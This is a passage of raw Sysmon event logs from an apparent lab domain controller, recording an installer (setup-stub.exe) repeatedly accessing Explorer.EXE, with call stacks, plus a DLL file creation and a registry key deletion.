System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000016330Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.364{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016329Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.364{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016328Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.364{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000016327Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.364{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000016326Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.364{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016325Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.364{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 11241100x800000000000000016324Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:53.255{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll2021-01-18 13:59:53.255 12241200x800000000000000016323Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-DeleteKey2021-01-18 13:59:53.255{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeHKLM\System\CurrentControlSet\Services\WinSock2\Parameters\AppId_Catalog\1F97E3EE 10341000x800000000000000016322Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.255{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000016321Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.255{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000016320Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.255{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016319Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.255{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016318Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.255{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000016317Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.255{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000016316Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.255{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016315Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.255{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000016314Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.255{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000016313Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.255{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000016312Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.255{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016311Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.255{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016310Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 